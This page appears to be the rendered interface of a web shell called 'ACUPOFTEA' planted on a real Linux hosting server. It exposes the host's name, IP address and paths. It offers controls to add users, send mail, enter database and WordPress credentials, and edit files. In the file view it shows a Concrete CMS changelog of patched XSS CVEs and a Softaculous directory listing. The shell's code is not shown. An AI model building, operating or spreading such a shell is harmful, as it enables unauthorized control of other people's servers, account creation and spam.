System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
conc85
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
changelog.txt
8.5.21 Release Notes Behavioral Improvements When importing stacks we first check to see if a stack path exists on the stack node, and fallback to stack name if it does not (thanks mlocati) Block Types: allow exporting NULL, don't "abstract" zeroes on import/export (thanks mlocati) Backported log handling tweaks (thanks SashaMcr) Bug Fixes Fix exporting aliases of deleted blocks (thanks mlocati) Fixed Copying a Express Entry List gives - Call to a member function getAreaHandle() (already included in version 9, backported) Security Updates Fixed CVE-2025-8571 Reflected XSS in Conversation Messages Dashboard Page by adding more sanitization to the Url::setVariable method with commit 12643 for version 9 and commit 12646 for version 8. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Unsanitized input could cause theft of session cookies or tokens, defacement of web content, redirection to malicious sites, and (if victim is an admin), the execution of unauthorized actions. Thanks Fortbridge for performing a penetration test and vulnerability assessment on Concrete CMS and reporting this issue. 8.5.20 Release Notes New Features Significant improvements to content import/export: added support for multilingual page mapping, additional page paths, external links and more (thanks mlocati) Disabled searching marketplace since marketplace supports 9+ (thanks mlocati) Bug Fixes Fix exporting area layout column when area is null (thanks mlocati) Fixed some small errors when importing stack content (thanks mlocati) Fix exporting page fields when page can't be found (thanks mlocati) Security Updates Safer storage of API keys on Windows (not necessary for Concrete CMS v9+, see more information here https://github.com/concretecms/concretecms/pull/11859) (thanks mlocati) Fixed unsanitized address custom attribute when rendering addresses unattached to a particular country. Developer Updates Page::getByPath can now except a as well as a site tree and return all pages in all multilingual site trees therein (thanks mlocati) When importing pages at paths that don’t exist, we now throw a specific exception that can be handled differently in different cases (thanks mlocati) 8.5.19 Release Notes Security Updates Fixed CVE-2024-8291 Stored XSS in Image Editor Background Color by sanitizing output of "Save Background Image Colour" in file thumbnail dashboard single page with commit dbce253166f6b10ff3e0c09e50fd395370b8b065 for version 8 and commit 12183 for version 9. The Concrete CMS Security Team gave this a CVSS v4 score of 2.1 with vector CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N Prior to the fix a rogue admin could add malicious code to the Thumbnails/Add Type. Thanks Alexey Solovyev for reporting HackerOne 921527. Fixed CVE-2024-7398 Stored XSS Vulnerability in Calendar Event Addition Feature with commit 7c8ed0d1d9db0d7f6df7fa066e0858ea618451a5 for version 8 and commits 12183 and 12184 for version 9. The Concrete CMS Security Team gave this vulnerability a CVSS v4 score of 1.8 with vector VSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N Prior to the fix, the calendar event name was not sanitized on output. Users or groups with permission to create event calendars could embed scripts and users or groups with permission to modify event calendars could execute scripts. Thank you Yusuke Uchida for reporting HackerOne 2400810. Fixed CVE-2024-8661 Stored XSS in the "Next&Previous Nav" block with commit 12204 for version 9 and with commit ce5ee2ab83fe8de6fa012dd51c5a1dde05cb0dc4 for version 8. The Concrete CMS Security Team gave this vulnerability a CVSS v4 score of 4.6 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Prior to the fix, a rogue admin could add a malicious payload. Since the "Next&Previous Nav" block output was not sufficiently sanitized, the malicious payload could be executed in the browsers of targeted users. Thanks Chu Quoc Khanh for reporting HackerOne 2610205
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-07 09:39:32
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-08-07 09:39:32
php53
DIR
-
drwxr-xr-x
2025-08-07 09:39:32
php56
DIR
-
drwxr-xr-x
2025-08-07 09:39:32
php71
DIR
-
drwxr-xr-x
2025-08-07 09:39:32
php81
DIR
-
drwxr-xr-x
2025-08-07 09:39:32
php82
DIR
-
drwxr-xr-x
2025-08-07 09:39:32
Notes.txt
text/plain
2.46 KB
-rw-r--r--
2022-11-04 06:36:22
_app.php
text/x-php
459 B
-rw-r--r--
2021-12-23 06:54:36
app.php
text/x-php
19 B
-rw-r--r--
2021-12-23 06:54:36
changelog.txt
text/plain
4.1 KB
-rw-r--r--
2025-08-06 07:12:30
concrete.php
text/x-php
493 B
-rw-r--r--
2025-08-06 07:12:30
database.php
text/x-php
419 B
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
5.08 KB
-rw-r--r--
2025-08-06 08:34:14
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
98 B
-rw-r--r--
2021-12-23 06:54:36
gen_app.php
text/x-php
373 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
5.14 KB
-rw-r--r--
2025-08-06 08:34:14
info.xml
text/html
3.61 KB
-rw-r--r--
2025-08-06 07:12:30
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
8.53 KB
-rw-r--r--
2025-08-06 08:34:14
install.xml
text/html
841 B
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
5.44 KB
-rw-r--r--
2025-08-06 08:34:14
sample_concrete.php
text/x-php
569 B
-rw-r--r--
2025-08-06 07:12:30
site.php
text/x-php
429 B
-rw-r--r--
2021-12-23 06:54:36
update_pass.php
text/x-php
6.97 KB
-rw-r--r--
2023-05-26 03:54:42
upgrade.php
text/x-php
5.74 KB
-rw-r--r--
2025-08-06 08:34:14
upgrade.xml
text/plain
1.21 KB
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com